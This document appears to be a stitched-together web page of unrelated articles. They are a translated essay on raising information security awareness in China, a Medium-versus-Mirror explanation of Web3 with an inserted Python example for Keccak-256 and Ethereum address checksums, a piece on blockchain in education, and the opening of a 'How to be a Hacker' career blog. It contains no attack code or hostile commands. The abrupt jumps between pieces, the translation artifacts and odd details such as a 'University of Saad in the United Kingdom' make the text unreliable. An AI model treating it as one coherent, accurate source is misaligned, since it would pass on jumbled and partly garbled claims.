Information security is the cornerstone of informatization and the guarantee that information networks operate normally and effectively. It has become an overall problem affecting national security, social stability and economic development. A country’s ability to obtain information and keep it secure is a symbol of comprehensive national strength, economic competitiveness and viability in the 21st century, and a trump card in future international competition. The development of society and the arrival of the digital network era have changed many aspects of daily life: bank deposits and withdrawals from any branch or location, surfing the Internet, online shopping and online transactions all bring convenience. But while computers and networks bring convenience and speed, they also impose conditions. People now carry less cash and more cards: bank credit cards, medical and social security cards, salary cards and so on. These cards are convenient, but precisely because of that convenience, the computer system only recognizes the card holder and cannot identify the real owner of the card, so people have to set passwords and other protections on each card to keep the information on it safe. This is an information security issue: people set various passwords to protect their information.

With the development and popularization of the Internet, network viruses, network attacks and network crime have rapidly become rampant on an unprecedented scale. Today’s viruses can spread around the world within ten minutes and disrupt the global economy in an instant. Network security has become a focus of global attention, and hackers and computer viruses threaten the normal operation of all kinds of organizations. As people rely more and more on computer networks, they find that the network is fragile. Information security has therefore received more and more attention worldwide, and has become an important measure of whether an information system is complete.

The International Organization for Standardization (ISO) defines information security as “technically and managerially established security protection for data processing systems to protect computer hardware, software and data from damage, change and disclosure due to accidental and malicious reasons”.

Main content of information security

The main contents of information security include: confidentiality, integrity, availability, authenticity and validity.

Information security mainly means maintaining the confidentiality, integrity and availability of information: using computer hardware and software technology, network technology, cryptographic technology and other security technologies, together with organizational and management measures, to protect information throughout its life cycle, so that its confidentiality, integrity and availability are not compromised at any stage of generation, transmission, exchange, processing and storage.

Confidentiality means ensuring that only those who have been granted specific permissions have access to information. How confidential a piece of information is depends on how many parties are allowed to access it: information everyone can access is public information, and information whose access must be restricted is sensitive or secret information. Information is divided into confidentiality levels according to its importance and the protection it requires; internal military documents, for example, are generally divided into three levels: secret, confidential and top secret. Authorized users may operate on confidential information according to their granted rights: some users can only read, others can both read and write.

Integrity means ensuring the correctness and completeness of information and of the methods used to process it. On one hand, it means that information is not tampered with, lost or corrupted while it is used, transmitted and stored; on the other, it concerns the correctness of the processing methods, since improper operations can cause the loss of important files or even paralyze the entire system.

Availability means ensuring that authorized users can access the information they need when they need it, that is, information and related information assets can be obtained promptly by those authorized to use them. For example, a severed communication line or network congestion can make information unavailable for a period and disrupt normal business; this is a loss of availability. Systems that provide information must be able to withstand attacks appropriately and recover from failure. In addition, the authenticity and validity of information must be guaranteed, so that business transactions and information exchanges between organizations, or between an organization and its partners, are trustworthy.

Information Security Development Status

Information security can be regarded as an emerging industry that grew out of China’s informatization drive. In general, the development of information security has gone through the following three stages:

(1) The budding stage

Before 2005, industries and departments across China began to develop an awareness of information security: from initially “emphasizing IT construction” while “ignoring the construction of security systems”, to “recognizing the importance of security” and “hoping to achieve information security”, while still finding information security very mysterious and not knowing where to start. At this stage, customers in various industries were consciously learning and accumulating information security knowledge and conducting extensive exchanges with authorities in the field to understand their technologies, concepts, products and services. At the same time, some small-scale, sporadic information security construction appeared in some enterprises and departments, but it had not reached scale or become systematic. Moreover, for information security in this period, government macro-policy consisted mostly of appeals, with relatively few concrete measures actually promoted. Although it all seemed very lively, very little actual information security construction took place.

(2) The outbreak stage

After 2005, the needs of domestic industries and departments for information security construction changed from “spontaneous” to “conscious”. Customers had basically understood the content and significance of information security construction, and many industry departments began to plan and deploy internal information security construction. Leaders in various industries attached great importance to it and kept increasing investment, so information security became the top priority of this phase of construction. In a sense, the explosion of demand in the information security market can be said to have been caused by the “debts” that industries had accumulated in information security over the years.

(3) The popularization stage

When information security construction is integrated into the overall IT construction of every industry, information security becomes one of the key links of IT construction: as important and ubiquitous as air, yet not easily noticed.

In the next 3 to 5 years, the information security market will maintain high-speed, large-scale growth, and telecommunications, government and finance will be the industries with the greatest demand for information security. The telecommunications and financial industries have large investment, fast development, a high degree of informatization, complex needs and a relatively severe security situation, while government departments, given their high standing and urgent security needs, serve as role models for others; so investment in information security will also increase there.

The biggest security issue of the 21st century is information security, together with the economic, political, military, social, technological and cultural security that rest on it. The weakest link in information security is likely to be careless people rather than software bugs. Attackers have compromised many extremely complex networks not only through superb technique but also by exploiting human weaknesses. Only by raising people’s security awareness to a very high level can the risk to information security be fundamentally reduced.

Effective Measures to Improve Information Security Awareness

A good information security environment is necessary to further deepen reform and opening up and to advance China’s socialist modernization, and it is also a foundation of national security. Its precondition is that all citizens have a strong awareness of information security and a high degree of vigilance in protecting sensitive national information.

1. Improve the information security awareness of leading cadres

Leading cadres at all levels are not only the main generators, transmitters, users and storers of sensitive information, but also the main targets of those who steal it. Therefore, in raising information security awareness, the information security competence of leading cadres at all levels is particularly important: only when leaders raise their own awareness of information security will they take information security work seriously, strictly implement laws and regulations, and rigorously organize and carry out information security inspections, so that information security work is effective and well done.

2. Improve the information security awareness of confidential personnel

Secret-related personnel are the principal managers of secret information security, responsible for sending, receiving and keeping confidential secret information. Building this team and improving its quality is key to doing information security work well. To improve the quality of secret-related personnel, in addition to raising their ideological understanding, cultivating a scientific and rigorous style of work and strictly abiding by laws, regulations and rules, they need professional training in information security and confidentiality under high-tech conditions, so that they master the use of modern technical tools to manage documents and archives, are familiar with their own business, have keen judgment and insight into phenomena that may cause leaks of secrets, and master a certain level of anti-theft technology.

3. Improve the information security awareness of professional and technical personnel

Professional and technical personnel are the new force in China’s information security management and the operators and maintainers of information security. They must have sufficient information security knowledge, fully understand the security properties of relevant security technologies, operating systems and application software, keep track of security news and developments in security technology, and develop good information security habits. The government should actively promote exchanges between China’s information technology professionals and other countries in cultivating information security awareness. Learning from foreign successes, using foreign research results, drawing on foreign educational strength, and introducing excellent foreign teaching materials and related theories is a shortcut to rapidly raising the level of information security awareness training for professional and technical personnel in China.

4. Raise the awareness of information security of the whole people

To enhance citizens’ awareness of information security and raise national information security awareness, information security education must be carried out for the whole population. To ensure the security of party and state secrets under any circumstances, the most fundamental thing is to do ideological education well and raise the information security awareness of the whole population. Industries and government information management departments at all levels should use public opinion and the media to publicize the importance of information security; compile information security knowledge manuals to strengthen self-protection capabilities; establish a system of security training for users at different levels and gradually raise the technical level of computer users through tiered training; and organize the study of laws and regulations on information security, popularize common-sense information security and introduce information security technologies. Only when the information security awareness of the whole population is enhanced can information security be fully guaranteed.

What is Web3


First, let’s look at the previous generations:


The first wave of the Internet began in the 1980s; its iconic event was two computers “communicating” with each other over a common protocol. That protocol is TCP/IP, created in 1983.

The network (World Wide Web) of this period could not do much “interconnection”; most information was read-only.

Netscape, which published information on the Internet, is typical of this period.

The network of this period had the following pain points:
  • High technical barriers to access
  • No information indexing function
  • No interaction with users and no recording of user data

Web 2.0 (2001-present)

After the dot-com bubble burst in 2000, a second wave began to sprout. Many companies set out to fix the pain points of the Web 1.0 model, including adding search and letting users upload content.
The Web 2.0 products that emerged at this time were more interactive: users could create, upload and share their own content.
An example is Google and Microsoft building their Gmail and Outlook products on top of SMTP (Simple Mail Transfer Protocol, 1981). While SMTP itself is open and transparent, Gmail and Outlook are closed platforms owned by the two tech giants. So the software that Web2 users actually interact with consists of products these giants built on top of Web1 open-source software.
Facebook (now renamed Meta) is a typical Web2 giant. It creates wealth by letting users read, write, interact and socialize on its platform, accumulating a large amount of data and traffic.

Web 3.0 (the concept was born in 2014)

Web 3.0 (hereinafter Web3) was first proposed by Gavin Wood, co-founder of Ethereum, in 2014, and suddenly attracted everyone’s attention at the end of 2021.
Web3 combines characteristics of Web1 and Web2: a transparent, open and open-source network in which users can read, write and upload content, and can also exchange value.
Conceptually, Web3 represents the next era of the Internet, in which the Internet shifts toward a more democratic paradigm. Web3 also stems from a change in how people view the value of today’s Internet: the Web 2.0 giants control the Internet and everyone’s data, so many people want to build an Internet that is truly “collectively owned”.
The core of Web3 is to let users not only read and write content but also own it, so that they are not at the mercy of centralized technology companies arbitrarily changing the rules. Web3 restores the openness of Web1, and the rules are the same for all market participants, so that giant companies cannot stifle innovation and market competition.
The corporate form under Web3 has also changed.

Comparison of Web2 products and Web3 products

Next, let’s compare two content creation products, Medium and Mirror, to see the differences between Web2 and Web3 products.
Medium is the world’s top content creation/blogging platform (somewhat similar to Zhihu in China, but with better content quality). Its founder Evan Williams is also a co-founder of Twitter and Blogger. As of May 2021, the platform had 180 million monthly active users and 750,000 paid subscribers*.
Compared with traditional blogging platforms, its biggest feature is a refined writing and reading experience; at the same time, it mainly shares and disseminates content through users’ social relationships.
Creators pay no fee to upload works, but if they want to earn income from content they must place it behind the paywall.
Readers can read general content for free, but to read paywalled content they must pay a membership fee of $5 per month or $50 per year.
Medium distributes a reader’s membership fee among the authors whose articles that reader has read, in proportion to the reader’s reading time. Top content creators may earn more than 50,000 US dollars per month. The platform also gives top creators additional monthly subsidies to encourage them to keep producing high-quality content and grow their audience.
Medium is currently valued at $600 million; its most recent financing was $57 million from A16Z and Google in January 2021.
Mirror is a blockchain-based content creation platform whose mission is to “revolutionize the way ideas are expressed, shared, and monetized.” Anyone with an Ethereum wallet can access the platform to create and earn. Its goal is to give content creators a way to publish their work confidently and securely while retaining control over their digital rights.
Mirror was founded by Denis Nazarov, a former partner at A16z (which is also an investor in Medium). It received a US$10 million investment from Union Square Ventures in July 2021 and is currently valued at US$100 million.
As of March 2022, Mirror had raised more than 8,000 ETH (approximately $24 million) for content creators.
The following figure shows the Mirror interface after linking a wallet:
Mirror currently provides creators with basic functions including publishing articles (Entry Editor), crowdfunding (Crowdfunds), digital collections (Editions), auctions (Auctions), and splits (Splits).
Crowdfunding: Anyone can initiate or participate in a crowdfund through Mirror. Supporters deposit ether (ETH) to fund the initiator and receive tokens in exchange; any project or idea can be tokenized. Many writers have launched crowdfunding projects on Mirror, trading future copyright/royalty income for funds today to sustain their writing and their living.
Digital collections (NFTs): Any content published on Mirror can be minted as an NFT after paying a fee.
(NFT stands for non-fungible token. Traditional cryptocurrencies such as Bitcoin are fungible tokens: any two tokens are interchangeable, and they can usually be split into smaller units. An NFT is unique, cannot be replaced by another NFT, and usually cannot be divided into smaller units; an NFT of a painting, for example, represents that painting itself. Blockchain is a decentralized digital ledger technology, and an NFT is a way of digitizing an asset on top of it. In practice, NFT does not refer to one specific form of digital asset; its scope is very broad and can be any form you can imagine, such as a picture, music, a video, an online collectible, or even a tweet. The creation, modification and transaction of these NFT digital assets are each recorded on the blockchain’s digital ledger.)
Auctions: NFT auctions are supported on Mirror.
Splits: A split on Mirror is an automatic way to share the value you generate with multiple entities. A split is a payable smart contract that forwards value to multiple addresses on Ethereum. A split can be a way to reward collaborators or people who inspired you, or to donate the proceeds of your work.
In terms of product form, the Mirror platform is more like a content crowdfunding platform: the digital content published on it is given value through NFT tokenization, and the ownership of a single piece of content can be sold through crowdfunding to multiple investors.
The set of tools Mirror provides to content creators raises “content monetization” to a new level; there may even be specialist content investors who profit from a keen eye for high-quality creators.
At the same time, the Mirror platform uses blockchain technology to address the following problems:
  • Content being censored and deleted
  • Malicious comments
  • Content being quoted or plagiarized at will
  • Creators’ economic interests being decided by the platform
Exclusive ENS domain name: Mirror does not require logging in with an email or other account; instead it integrates the decentralized domain name service ENS* to establish the creator’s identity. Initially, a subdomain of mirror.xyz serves as the home page of the creator’s own publishing space.
(Note: ENS is the Ethereum Name Service. It provides, in decentralized form, human-readable name resolution for blockchain addresses, Web3 storage resources and even social information, and is the most widely integrated blockchain naming standard.)
Signature on-chain: Once content is signed and confirmed, three pieces of data are displayed at the bottom of the content page (as shown in the figure above): the “Arweave* Transaction ID”, the “Contributor Ethereum Address*” and the “Content Digest”. All of this information is publicly viewable on the blockchain, so anyone can verify whether an item of content was written by a specific Ethereum account. Every published entry and every change to its content must be signed by the user with their signing key and then published to Arweave for storage.
(Note: Arweave is a decentralized cloud storage solution that aims to use blockchain to disrupt the traditional storage market. Unlike other cloud storage solutions, Arweave not only has the security advantages of decentralized storage; users can also choose one-time permanent storage. Ethereum is a decentralized, open-source public blockchain platform with smart contract functionality. An Ethereum address represents an Ethereum account. For external accounts, the address represents the last 20 bytes of the account’s public key, written in hexadecimal and usually prefixed with 0x, for example 0xcd2a3d9f938e13cd947ec05abc7fe734df8dd826. Once content has been sent to Ethereum it can no longer be deleted or tampered with.)
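The note above describes an Ethereum address as 20 bytes derived from the account’s public key; the precise rule, used in the added example below, is the last 20 bytes of the Keccak-256 hash of the 64-byte uncompressed public key. This example is not Mirror’s or Ethereum’s own code: it implements Keccak-256 (the pre-standard variant Ethereum uses, which differs from hashlib’s SHA3 padding), derives an address from a public key, and validates the EIP-55 mixed-case checksum that a split contract’s recipient list or any other address taken from user input should be checked against before funds are sent to it. The sample public key is the secp256k1 generator point, a well-known public value used only as test input; all function names are assumptions made for the illustration.

```python
# Added example (not Mirror's or Ethereum's own code). Keccak-256 is written out
# here because hashlib.sha3_256 applies the FIPS 202 padding byte 0x06, whereas
# Ethereum uses the original Keccak padding byte 0x01, so the two digests differ.

MASK64 = (1 << 64) - 1
ROUND_CONSTANTS = [
    0x0000000000000001, 0x0000000000008082, 0x800000000000808A, 0x8000000080008000,
    0x000000000000808B, 0x0000000080000001, 0x8000000080008081, 0x8000000000008009,
    0x000000000000008A, 0x0000000000000088, 0x0000000080008009, 0x000000008000000A,
    0x000000008000808B, 0x800000000000008B, 0x8000000000008089, 0x8000000000008003,
    0x8000000000008002, 0x8000000000000080, 0x000000000000800A, 0x800000008000000A,
    0x8000000080008081, 0x8000000000008080, 0x0000000080000001, 0x8000000080008008,
]
# Rotation offsets indexed [x][y] for the rho step.
ROTATION = [[0, 36, 3, 41, 18], [1, 44, 10, 45, 2], [62, 6, 43, 15, 61],
            [28, 55, 25, 21, 56], [27, 20, 39, 8, 14]]


def _rol(v: int, n: int) -> int:
    return ((v << n) | (v >> (64 - n))) & MASK64


def _keccak_f(a):
    """Keccak-f[1600] permutation on a 5x5 lane array a[x][y]."""
    for rc in ROUND_CONSTANTS:
        c = [a[x][0] ^ a[x][1] ^ a[x][2] ^ a[x][3] ^ a[x][4] for x in range(5)]  # theta
        d = [c[(x - 1) % 5] ^ _rol(c[(x + 1) % 5], 1) for x in range(5)]
        a = [[a[x][y] ^ d[x] for y in range(5)] for x in range(5)]
        b = [[0] * 5 for _ in range(5)]                                           # rho + pi
        for x in range(5):
            for y in range(5):
                b[y][(2 * x + 3 * y) % 5] = _rol(a[x][y], ROTATION[x][y])
        a = [[b[x][y] ^ (~b[(x + 1) % 5][y] & b[(x + 2) % 5][y])                 # chi
              for y in range(5)] for x in range(5)]
        a[0][0] ^= rc                                                             # iota
    return a


def keccak256(data: bytes) -> bytes:
    """Keccak-256: rate 136 bytes, pad10*1 with the 0x01 domain byte."""
    rate = 136
    buf = bytearray(data) + b"\x01"
    buf += b"\x00" * (-len(buf) % rate)
    buf[-1] |= 0x80
    state = [[0] * 5 for _ in range(5)]
    for off in range(0, len(buf), rate):
        for i in range(rate // 8):  # absorb one block; lanes are little-endian
            lane = int.from_bytes(buf[off + 8 * i:off + 8 * i + 8], "little")
            state[i % 5][i // 5] ^= lane
        state = _keccak_f(state)
    return b"".join(state[i % 5][i // 5].to_bytes(8, "little") for i in range(4))


def address_from_pubkey(x: int, y: int) -> str:
    """Externally owned account address: last 20 bytes of Keccak-256(x || y)
    over the 64-byte uncompressed public key, as lowercase hex with 0x prefix."""
    return "0x" + keccak256(x.to_bytes(32, "big") + y.to_bytes(32, "big"))[-20:].hex()


def to_checksum_address(addr: str) -> str:
    """EIP-55 mixed-case checksum: uppercase each hex letter whose position in
    Keccak-256(lowercase address without 0x) has a nibble >= 8."""
    raw = addr[2:].lower()
    digest = keccak256(raw.encode()).hex()
    return "0x" + "".join(ch.upper() if int(digest[i], 16) >= 8 else ch
                          for i, ch in enumerate(raw))


def validate_payout_address(addr: str) -> str:
    """Check an address taken from user input (for example a split recipient)
    and return its EIP-55 form. Raises ValueError on malformed input or on a
    mixed-case address whose checksum does not match. All-lowercase or
    all-uppercase input carries no checksum, so it is returned checksummed
    but offers no typo protection."""
    if not (addr.startswith("0x") and len(addr) == 42):
        raise ValueError("address must be 0x followed by 40 hex digits")
    body = addr[2:]
    if any(ch not in "0123456789abcdefABCDEF" for ch in body):
        raise ValueError("address contains non-hex characters")
    expected = to_checksum_address(addr)
    if body != body.lower() and body != body.upper() and addr != expected:
        raise ValueError("EIP-55 checksum mismatch: possible typo in address")
    return expected


# Sample public key: the secp256k1 generator point, a well-known public value
# (it corresponds to private key 1), used here only as test input.
SAMPLE_PUBKEY_X = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798
SAMPLE_PUBKEY_Y = 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8

if __name__ == "__main__":
    addr = address_from_pubkey(SAMPLE_PUBKEY_X, SAMPLE_PUBKEY_Y)
    print(addr)                           # 0x7e5f4552091a69125d5dfcb7b8c2659029395bdf
    print(validate_payout_address(addr))  # same address in EIP-55 mixed case
```

The checksum is the only protection a payout address has against a transposed or mistyped character, which on an append-only ledger cannot be corrected afterwards; accepting all-lowercase addresses keeps compatibility, but a stricter policy may require the mixed-case form.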
Compared with Medium’s architecture, Mirror is content-centric.
The browser resolves the content hash through the blockchain’s domain name system (ENS), then fetches the web application itself from a decentralized storage system (Arweave). When the user interacts with the web page, the page does not send requests to a specific application server, since there is no Google server and no Medium server; instead it reads and writes against a decentralized storage system or an indexer.
Let’s take a closer look at the differences between the two product architectures.
Medium (Web2 product)
1. Front-end: the front end of a website comprises its presentation and structural layers: the structure of the web page, its visual appearance, and the implementation of interaction.
Front-end code (usually written in JavaScript, HTML and CSS) defines a product’s user interface logic, such as what the Medium website looks like and what happens when a user interacts with elements on the page (buttons, status bar, small icons, etc.).
2. Backend: the backend mainly interacts with the database and processes the corresponding business logic. It must consider how to implement functionality, data access, platform stability and performance, and so on.
The backend code (written in languages such as Node.js, Java or Python) must define the business logic of the Medium website very precisely: for example, how the website behaves when a new user signs up, publishes a new post, or comments on someone else’s post.
3. Database: the website must have a database to store its data, also called data space.
Most websites today are dynamic sites developed with ASP or PHP, and site data is stored in a dedicated database. Site data can be published to the database directly through the site’s back office, and the site reads that data. To store user information, uploads, tags, comments, likes and so on, the database must be updated constantly.
Take Medium as an example: a user tries to log in to Medium and upload content. The user enters a username and password on the front end (client) and sends an HTTP/HTTPS request to the back end (server). On receiving the request, the back end queries the database to check whether the username and password are correct, and the query returns the result together with other user information to the back end. The back end then sends an HTTP/HTTPS response to the front end, which renders it on the page. All of this code is hosted on centralized servers and delivered to users through their browsers.
Mirror (Web3 product)
1. Signature: the first difference in a Web3 product is the front-end login method: users do not need an account and password system.
Just as Google lets users access many applications without creating multiple accounts, crypto wallets play a similar role in Web3. A wallet user can connect to a decentralized protocol at any time and start using it without submitting personal information or registering an account. Web3 applications do not need to query a database to read user data (Web3 has no such centralized database), because all user data is public on chain. Users connect a wallet (a browser extension on the web, a separate app on mobile) and sign a transaction to log in.
2. Front-end: the front-end user experience is not much different from Web2, but the front-end code is stored on decentralized servers.
3. Node management: Mirror runs on a decentralized network such as Ethereum, in which every node keeps a copy of the full state of the Ethereum state machine, including the code and data of every smart contract. For the front end to communicate with a smart contract and call its functions, it must interact with one of these nodes.
Any node can broadcast a request to execute a transaction on the EVM (Ethereum Virtual Machine), so besides running your own Ethereum full node, you can also use API services from third-party providers to connect the front end to smart contracts.
4. Virtual machine: the virtual machine is the core module of the Web3 architecture. Unlike Web2 applications, Web3 has no backend or database in the traditional sense and needs no centralized web server to host back-end logic.
A virtual machine here simply means a code execution environment built on a decentralized blockchain. The mainstream ones on the market today are the Ethereum Virtual Machine (EVM) and EVM-compatible virtual machines. Based on the account model, it runs smart contract code in complete isolation from the outside world, realizing a Turing-complete smart contract system. Ethereum relies on thousands of people running a piece of software on their own computers to power the network; each node (computer) in the network runs the Ethereum virtual machine. Think of the EVM as an operating system that understands and executes software written in a specific programming language on Ethereum. In Mirror’s architecture the EVM takes on the role of database plus backend: data is stored on chain, and smart contracts process it.
5. Smart contract: a program that executes code on the blockchain when certain conditions are met; the parties approve and maintain its operation by digitally signing the contract.
A smart contract is in fact the same piece of code stored in the blockchain (on every node). This code defines the rules of the contract. When the input meets the required conditions, the smart contract code on every node executes automatically and independently, and the nodes automatically cross-check that all execution results are identical.
6. External storage: because of the blockchain’s ledger synchronization, on-chain storage is very expensive, so most data that takes up space and is not critical is stored on a third-party decentralized storage platform such as IPFS, Swarm or Arweave.
Take Mirror as an example: the user connects a wallet through the browser interface, writes an article, signs it with the wallet, and sends the transaction to the chain. The article is sent to Arweave through Mirror’s backend (currently Mirror pays for users’ Arweave uploads from a centralized account). The transaction containing the Arweave transaction information is then submitted to Ethereum to be included in a block.
Meanwhile, the wallet interacts with a provider to connect to Ethereum, and Mirror’s own server also sends and queries transactions through the provider and feeds the results back to the front end.


Comparing the two products, Medium and Mirror, shows that, at the technical level, blockchain distributed storage provides a commercially feasible solution for transparent and tamper-resistant information.

As an emerging concept, Web3 is still at an early stage of development. Architecturally, it is clear that a new set of infrastructure is required, including a variety of products and services, from the underlying network stack to the consensus model or virtual machine.
Although there are also some challenges at the regulatory level, compared with Bitcoin the narrative and positioning adopted by Web3 are very moderate in political stance, more pragmatic, and more easily accepted by the mainstream.
Application of Blockchain Technology in Education and Other Sectors


Blockchain technology is regarded as another disruptive technology after cloud computing, the Internet of Things and big data, and has attracted great attention from governments, financial institutions and enterprises. Essentially, blockchain is a technical scheme for maintaining a reliable database through decentralization and high trust. Its core technologies are distributed ledger technology, asymmetric cryptography and smart contracts, and its distinguishing characteristics are decentralization, a consensus mechanism, traceability and high trust. Today, as the underlying technology of Bitcoin, blockchain technology is applied not only in finance but also has great potential in education.


Moreover, blockchain technology is expected to play an important role in building an “Internet + education” ecosystem that promotes reform of the education system. Drawing on the experience of blockchain in finance, its application in education is mainly embodied in six areas: establishing individual knowledge on big data, creating intelligent education platforms, developing a degree certificate system, building a new ecosystem of open educational resources, achieving “self-organized” operation of networked learning communities, and decentralizing the education system.

As seen:

  • In finance, global banking giants formed the R3 consortium, including more than 40 large international financial institutions such as HSBC, UBS and Bank of America, to jointly develop blockchain technology. Nasdaq in the United States took the lead in launching Linq, a securities trading platform based on blockchain technology, an important milestone in the trend toward decentralization in the securities market. Clearly, the impact of blockchain and related technologies on the financial sector deserves close attention.
  • In technology, IBM and The Linux Foundation established the dedicated open-source blockchain project Hyperledger Fabric, which has entered substantive development. IBM will provide the Watson API on the Watson IoT platform to help enterprise customers and developers build and test cloud-based IoT applications, aiming to use blockchain to lead the autonomy of the Internet of Things.
  • In energy, foreign companies have launched energy blockchain projects: Germany’s Siemens has cooperated with a New York start-up to apply blockchain technology to the microgrid power trading market, and the American energy company LO3 Energy and the Bitcoin development company ConsenSys have cooperated to build TransActive Grid, an interactive grid platform based on blockchain, for a small number of residents in the Gowanus and Park Slope neighborhoods of Brooklyn, New York.
  • In food, a research report from the University of Saad in the United Kingdom pointed out that applying blockchain technology to the food supply chain, by making food data transparent, may reduce food waste. In addition, Walmart is also trying to use blockchain technology to record the origin of food, giving consumers more information about it and improving some of the current chaos in the food industry.
  • In medicine, Philips Medical and Tierion have cooperated so that Philips Medical can use blockchain technology to authenticate medical records and protect patient privacy. Blockchain technology helps solve the large-scale data quality problems the medical industry currently suffers from and gives it a single source of authentic data, so the system no longer suffers from human error or manual data reconciliation, thereby addressing the problem of trust in medical data.

Enlightenment on the application of blockchain in the field of education

The application of blockchain technology is bringing disruptive change to the financial sector and creating new business opportunities. Studying how blockchain technology is applied in finance shows that its value for innovation and development there lies mainly in: eliminating intermediary trading platforms and reducing transaction costs; settling transactions in real time, improving transaction efficiency and asset utilization; storing transaction data in a distributed form that cannot be tampered with and is highly secure; and automating the transaction process through smart contracts. The application scenarios and models of blockchain technology in finance offer the following lessons for its application in education:

(1) Strengthen intellectual property protection and build an educational trust system. The traceability of digital currency can reduce banks’ spending on compliance verification and auditing such as anti-money-laundering and anti-fraud, and effectively curb illegal activities such as tax evasion and money laundering. In education, the traceability of blockchain technology can be used to protect the copyright of educational assets and intellectual output, resolving intellectual property disputes at the source. In addition, digital currency stored on a blockchain is highly secure and reliable. In education, important information such as student grades, personal files and academic certificates can be stored on the blockchain to prevent it from being lost or maliciously tampered with, building a safe, credible and tamper-proof student credit system and helping to address the current lack of student credit records and the global problem of academic fraud.

(2) Optimize the educational business process to achieve efficient and low-cost educational resource transactions. In terms of cross-border payment, the blockchain uses the characteristics of decentralization to abandon the role of intermediary banks and realize point-to-point fast and low-cost cross-border payments. In terms of educational resource sharing, the use of distributed ledger technology to realize the direct connection between users and resources can simplify the operation process and improve the efficiency of resource sharing, so as to promote the open sharing of educational resources and solve the problem of resource islands. In terms of educational resource transactions, the use of decentralized features eliminates transaction intermediary platforms and realizes point-to-point connections between consumers and resources, thereby reducing expenses, simplifying operating procedures, and creating an efficient and low-cost educational resource transaction platform.

(3) Use the characteristics of decentralization to build a decentralized education system. Applied to supply chain finance, blockchain technology eliminates intermediate transaction agencies and reduces human intervention, lowering costs and operational risks. Wave has reached a cooperation agreement with Barclays Bank to put the letter of credit, bill of lading number and documents of the international trade process on a public chain, where they are authenticated and verified against tampering, establishing completely transparent “rules of the game” and decentralizing the verification rules. In the field of education, blockchain can be used to develop a decentralized education system that breaks the monopoly of schools and government agencies over traditional education services, so that any institution with educational qualifications can provide educational services and issue valid academic certificates. The effective integration of formal and non-formal education promotes a reform of the education system in which everyone can participate.

(4) Distributed storage and recording of credible learning data to connect schools and enterprises efficiently. Blockchain technology makes the securities trading market more open, transparent, green, fair and efficient, turning the traditional model that depended heavily on intermediaries into a decentralized, flat network transaction model with distributed storage and recording of data. In the field of education, students’ personal information, academic performance, growth records and other content can be stored in a similar way, distributed across the education system, and shared with other schools or recruiting units on the basis of ensuring the authenticity and security of the information, serving as an important basis for student job interviews. Distributed ledger technology can show employers a student’s academic achievements and professional skills, building a bridge between students and enterprises and establishing a new model of school-enterprise cooperation that connects students and employers efficiently.

(5) Develop educational smart contracts and build a new mode of network resource and platform operation. Smart contract technology in the blockchain can automate a large number of the manual and semi-manual verification and management tasks in current financial transaction processes, making the transaction system more intelligent. In the construction of open educational resources, the transparency and automatic execution of smart contracts can automate resource uploading, certification, transfer and sharing, reducing the cost and improving the efficiency of resource sharing, and building a new form of network resource circulation. In addition, smart contracts can be used to build an efficient and intelligent online learning community that runs in a “self-organizing” way, monitors the community’s ecological environment in real time, automatically blocks and deletes inappropriate speech, and creates a positive community atmosphere.

Challenge of Using Blockchain in Education

Blockchain technology achieves anonymity by severing the link between a transaction address and the real identity of the address holder, preventing the disclosure of user privacy despite the transparency of transaction information. However, this protection is limited: by observing and correlating block information and user IDs, an observer can still track down a user’s personal information. The application of blockchain technology in education therefore faces the risk that the privacy of teachers and students is leaked, mainly in two ways. First, all transaction information is open and transparent; any information can be tracked and queried, and conclusions about the status and behavior of teachers and students can then be inferred or predicted, which is not conducive to protecting their personal privacy. Second, the security of the blockchain is guaranteed by algorithms: in theory, data can only be tampered with if more than 51% of the nodes are compromised at the same time; however, with the development of mathematics, cryptography and computing technology, it is difficult to guarantee that the algorithms will not be broken in the future, leading to the leakage of teacher and student information.

Twitter: @jimmwayans | www.jimmwayans.com

How to be a Hacker

How to be a Hacker or a Cybersecurity Expert?

So you want to be a Hacker?

Recently I’ve been reading a ton of questions, posts and general discussion about getting into the ‘Information Security’ game, and in my opinion at least it’s typically followed up by a fair amount of misleading information. That might be a little harsh considering I’m sure it’s well intentioned; it’s also even possible that the advice worked for them (there is no one-size-fits-all advice), but I thought I’d lay my thoughts out here in the hope of helping a new budding hacker or infosec enthusiast move forward.

I want to play sport, where should I start?
This vague, open-ended and very ambiguous question is very similar to someone asking how they should go about getting into information security. The first thing to realize is that there is a huge range of information security fields, and within each of those huge fields is a lifetime’s worth of learning content. Just like picking a sport there is no ‘best’; it’s simply that sometimes there are areas you may enjoy more than others. Off the top of my head, here are some example areas (by no means an exhaustive list):

  • Web Application Security
  • Mobile Application Security
  • Reverse Engineering
  • Malware Reverse Engineering
  • Cloud Security
  • Network Security
  • Incident Response
  • Hardware Hacking
  • IoT Hacking
  • Risks, Governance and Compliance
  • Programming / Creating Tools for Others
  • Exploit Development
  • Forensics
  • etc…


Some of these are more technical in nature while others have a more theoretical focus. I guarantee that whatever you like, there are others out there who will find it boring, just as you sometimes will with what others are interested in. Right now it’s expected that if you’re reading this you may know very little about any of these areas, but what’s important is your willingness to learn and what type of motivation you have.

The Hacking Type
One trademark that is almost universal among people throughout those fields is their focus on independent, self-directed learning. Unfortunately in some ways security is still considered a ‘dark art’; I mean, why would anyone want to know how to break into a computer system unless they were going to do so? As a result plenty of people will show disdain or outright hostility when asked security-related questions, under the false (perhaps sometimes true) assumption that it’s merely a ‘script kiddie’ looking to learn to hack systems instead of wanting to learn and use that knowledge for a good purpose. It’s also a fact that the ‘learning’ resources of information security are quite disjointed, with no real central repository of learning material.

The point of highlighting this is that if you wish to prosper and successfully enter the information security field you should be prepared to jump in and find your way without waiting for someone to hold your hand and lead you down the right path. Google some of the above terms and see what sounds like fun. Despite what sometimes seems like a constant battle to find the ‘best’ field to learn, or the ‘best’ resource, or the ‘best’ way to learn, often more time is spent procrastinating over these questions than dedicating the time to actually learning. Look up videos on YouTube for hacking examples – it’s OK if you don’t know what a lot of it means, but write down a list, then Google those terms. Use points of interest to spread out into an ever-increasing web of knowledge around topics you’re interested in.

Do I need to learn X first?
Of course you need to have full knowledge of the OSI layers before you begin. Yes, you need to read that 1000-page book on the TCP protocol. Yes, you need to be proficient in 5 programming languages (at least!) before you consider hacking. Can you compile your own Linux kernel from source code? No? Don’t bother learning hacking. Actually… all of that is rubbish, yet it’s one of the most common responses given to people looking to learn information security. There is one requirement to becoming a decent hacker – interest. The difference between a future hacker and a script kiddie isn’t knowledge, it’s the willingness to learn.

